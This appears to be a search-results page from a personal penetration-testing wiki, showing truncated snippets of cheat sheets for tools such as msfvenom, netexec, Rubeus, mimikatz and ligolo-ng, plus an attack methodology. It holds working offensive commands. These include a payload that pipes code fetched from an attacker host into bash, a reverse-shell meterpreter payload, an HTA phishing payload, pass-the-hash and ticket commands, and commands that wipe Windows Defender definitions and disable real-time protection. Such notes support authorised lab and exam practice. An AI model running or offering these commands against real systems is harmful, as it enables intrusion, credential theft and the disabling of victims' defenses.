Search Results

40 total results found

ffuf

Hacking Tools

Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ

Primary Function
Enumeration

nikto

Hacking Tools

Basic usage nikto -host http://TARGET_IP -p PORT

Primary Function
Enumeration

gobuster

Hacking Tools

Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt Enumerating with extensions (filter the extension based on target) gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/direc...

Primary Function
Enumeration

netexec

Hacking Tools

Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol winrm netexec winrm targets.txt -u user_name -H '...

Primary Function
Enumeration
Secondary Function
Privilege Escalation
Secondary Function
Pivot

powerview

Hacking Tools

1. Enumerate common names Get-DomainComputer | select cn

Primary Function
Enumeration

msf

Hacking Tools

Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payl...

Primary Function
Privilege Escalation

rubeus

Hacking Tools

Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt

powersploit

Hacking Tools

Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword

Primary Function
Privilege Escalation

mimikatz

Hacking Tools

You will need to first upload the binaries to the target, either via a meterpreter shell or powershell: meterpreter upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys powershell power...

Primary Function
Pivot
Secondary Function
Privilege Escalation
Secondary Function
Enumeration

ligolo-ng

Hacking Tools

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent ...

Primary Function
Pivot

Quick Checklist

Hacking Cheatsheets

Personal Checklist [ ] Enumeration [ ] nmap [ ] autorecon [ ] HTTP/S? [ ] gobuster/dirbuster [ ] nikto [ ] wpscan [ ] User - Privesc [ ] id [ ] lxd [ ] sudo -l [ ] gtfobins [ ] linpeas.sh [ ] SUID/GUID - gtfobins ...

New Page

Hacking Cheatsheets

Advanced Methodology

Hacking

1. Enumeration

Hacking Advanced Methodology

Automated approach autorecon TARGET_IP Manual approach nmap TARGET_IP -p- --min-rate 1400 -sV -T 4 -sC -oN output.txt If the target is Windows use the below nmap TARGET_IP -Pn -sV -T 4 -sC -oN output.txt #or this if you want to dive deeper nmap TARG...

2. Initial Access

Hacking Advanced Methodology

Phishing

Hacking Advanced Methodology

HTA payloads Ping <html> <head> <script language="JScript"> var shell = new ActiveXObject("WScript.Shell"); var res = shell.Run("ping -n YOUR_IP"); </script> </head> <body> <script language="JScript"> self.close(); </script> </body> </html> ...

3. Privilege Escalation - Windows

Hacking Advanced Methodology

PowerUp Upload the following script to the host /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 Load on the target and run it . .\PowerUp.ps1 Invoke-AllChecks Troubleshoot, make sure the service you are trying to abuse is actua...

4. Post Compromise

Hacking Advanced Methodology

Blast AV and enable RDP with hashes cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM...